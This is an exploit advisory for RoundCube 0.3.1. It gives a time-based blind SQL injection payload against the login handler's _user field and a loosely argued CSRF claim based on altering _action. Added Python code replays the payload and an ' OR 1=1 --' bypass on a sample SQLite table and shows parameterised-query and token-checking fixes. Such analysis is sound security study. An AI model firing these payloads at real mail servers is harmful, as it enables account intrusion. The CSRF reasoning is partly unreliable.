Title: RoundCube 0.3.1 SQL injection
Author: Smith Falcon
Download URL: http://roundcube.net/download
Version: 0.3.1
Tested on: Linux
The login handler is vulnerable to SQL injection. The advisory attributes it to the _timezone parameter, but the proof-of-concept request below injects through _user, and its payload uses BENCHMARK() as a time delay (a time-based blind test: the server stalls while MySQL computes MD5 2,500,000 times per scanned row) rather than a UNION query.
"POST" data sent to
http://[target]/roundcube/index.php
_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2C MD5 (1))+or+'1'='1"
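What the concatenated query does with that _user value, as an added example that is not from the advisory or from RoundCube's code: it decodes the advisory's payload and runs it (and, going beyond the page, a plain authentication-bypass variant) against a constructed SQLite table, with stand-in BENCHMARK()/MD5() functions that count evaluations instead of burning CPU, beside the parameterised query that closes the hole. The table, passwords, bypass string and latency samples are constructed for the example.

```python
import hashlib
import sqlite3
import statistics
from urllib.parse import unquote_plus

# The _user and _pass values exactly as they appear in the advisory's POST data.
RAW_USER = "1'+or+BENCHMARK(2500000%2C MD5 (1))+or+'1'='1"
PASSWORD = "FrAmE30."
# Classic authentication-bypass variant of the same hole (not from the advisory).
BYPASS_USER = "' OR 1=1 --"

# Constructed sample table; not RoundCube's real schema.
USERS = [("alice", "pw-alice"), ("bob", "pw-bob")]


class Probe:
    """Records how often, and how hard, the injected BENCHMARK() ran."""

    def __init__(self):
        self.benchmark_calls = 0
        self.iterations = 0


def open_db(probe):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)

    # SQLite has no BENCHMARK()/MD5(); register stand-ins with MySQL's shapes.
    # MySQL's BENCHMARK(n, expr) evaluates expr n times and returns 0; the
    # stand-in counts instead of looping, so the demo stays fast.
    def benchmark(count, _expr):
        probe.benchmark_calls += 1
        probe.iterations += int(count)
        return 0

    conn.create_function("BENCHMARK", 2, benchmark)
    conn.create_function("MD5", 1, lambda x: hashlib.md5(str(x).encode()).hexdigest())
    return conn


def vulnerable_login(conn, user, password):
    """PHP-style string concatenation: the quotes inside `user` become SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (user, password))
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn, user, password):
    """Parameterised query: `user` is bound as one literal and matches no row."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]


def run_demo():
    """Run both payloads through both query styles and report what happened."""
    user = unquote_plus(RAW_USER)  # '+' -> space, %2C -> ','
    vuln, safe = Probe(), Probe()
    return {
        "decoded_user": user,
        # Wrong password, so no row matches either way ...
        "vulnerable_rows": vulnerable_login(open_db(vuln), user, PASSWORD),
        "safe_rows": safe_login(open_db(safe), user, PASSWORD),
        # ... but only the concatenated query ever executed the attacker's
        # BENCHMARK(): once per scanned row, 2.5M MD5 rounds each in MySQL.
        "vulnerable_benchmark_calls": vuln.benchmark_calls,
        "vulnerable_iterations": vuln.iterations,
        "safe_benchmark_calls": safe.benchmark_calls,
        # The bypass variant turns the WHERE clause into "'' OR 1=1" and
        # comments out the password check, so every user comes back.
        "bypass_vulnerable_rows": vulnerable_login(open_db(Probe()), BYPASS_USER, "x"),
        "bypass_safe_rows": safe_login(open_db(Probe()), BYPASS_USER, "x"),
    }


def time_based_signal(baseline_ms, probe_ms, min_ratio=5.0):
    """How a tester reads the real thing over HTTP: the median response time
    with the BENCHMARK payload must dwarf the median for a harmless login."""
    return statistics.median(probe_ms) >= min_ratio * statistics.median(baseline_ms)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
    # Constructed latency samples in milliseconds, not real measurements.
    print("delay signal:", time_based_signal([120, 135, 128, 131], [2410, 2380, 2455, 2402]))
```

The counting stand-in is what makes the point visible offline: with the wrong password both query styles return no row, so the only difference an attacker can observe is the delay, and only the concatenated query ever evaluates the injected function.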
XRF (cross-site request forgery) flaw [ POC ]
POST variable
Changing the variable _action=login to "_action=anything" shows that the site is
vulnerable to XRF attacks. When you replay the request with Live HTTP Headers, you
see a logged-in URL, which shows that RoundCube 0.3.1 is vulnerable to XRF
attacks. Successful tampering leads to compromise of the username.
_action=loggedin
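A model of the check that the _action change sidesteps, as an added example that is not from the advisory or from RoundCube's code: a dispatcher that enforces _token only when _action is exactly "login" (the hypothesis behind the write-up's observation), beside a hardened dispatcher that requires a valid per-session token for every state-changing action and compares it in constant time. The action table, session layout and victim username are assumptions; the replayed body is the advisory's capture with _action changed to loggedin.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# The advisory's captured login POST body, replayed with _action changed from
# "login" to "loggedin" as the write-up describes. The _token is the captured
# one and is stale by the time of the replay; "victim" is an assumed username.
CAPTURED_BODY = ("_pass=FrAmE30.&_url=_task=mail&_timezone=_default_"
                 "&_token=cd5bf19253710dfd569f09bfab862ab3&_action=loggedin&_user=victim")

# Hypothetical action table for the model, not RoundCube's real dispatcher.
KNOWN_ACTIONS = {"login", "loggedin", "logout", "list"}
STATE_CHANGING = {"login", "loggedin", "logout"}


def new_session():
    """Server-side session with a fresh, unguessable per-session CSRF token."""
    return {"user": None, "csrf_token": secrets.token_hex(16)}


def parse_body(body):
    return {k: v[0] for k, v in parse_qs(body).items()}


def perform(session, action, params):
    """Stand-in for the application logic: binds the session to the posted user."""
    if action in ("login", "loggedin"):
        session["user"] = params.get("_user", "")
    return f"accepted:{action}:{session['user']}"


def vulnerable_dispatch(session, body):
    """Model of the flaw: the token is only enforced for the documented action
    value, so any other _action value reaches the same code path unchecked."""
    params = parse_body(body)
    action = params.get("_action", "")
    if action == "login" and params.get("_token") != session["csrf_token"]:
        return "rejected:csrf"
    return perform(session, action, params)


def hardened_dispatch(session, body):
    """Reject unknown actions, and demand a valid token for every
    state-changing one, whatever action name the request carries."""
    params = parse_body(body)
    action = params.get("_action", "")
    if action not in KNOWN_ACTIONS:
        return "rejected:unknown-action"
    if action in STATE_CHANGING:
        token = params.get("_token", "")
        expected = session["csrf_token"]
        # Constant-time compare on bytes: no timing leak, and no TypeError
        # from compare_digest on a non-ASCII str sent by the attacker.
        if not token or not hmac.compare_digest(token.encode(), expected.encode()):
            return "rejected:csrf"
    return perform(session, action, params)


def legitimate_body(session, action="login"):
    """What the genuine form posts: the caller's own current token."""
    body = CAPTURED_BODY.replace("_action=loggedin", f"_action={action}")
    return body.replace("cd5bf19253710dfd569f09bfab862ab3", session["csrf_token"])


if __name__ == "__main__":
    print("vulnerable, replayed:", vulnerable_dispatch(new_session(), CAPTURED_BODY))
    print("hardened, replayed:  ", hardened_dispatch(new_session(), CAPTURED_BODY))
    genuine = new_session()
    print("hardened, genuine:   ", hardened_dispatch(genuine, legitimate_body(genuine)))
```

The forged request only needs the attacker to know the form's field names, never the victim's token, which is why the fix has to key the check on what the request does rather than on which _action string it names.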
Credits - iqZer0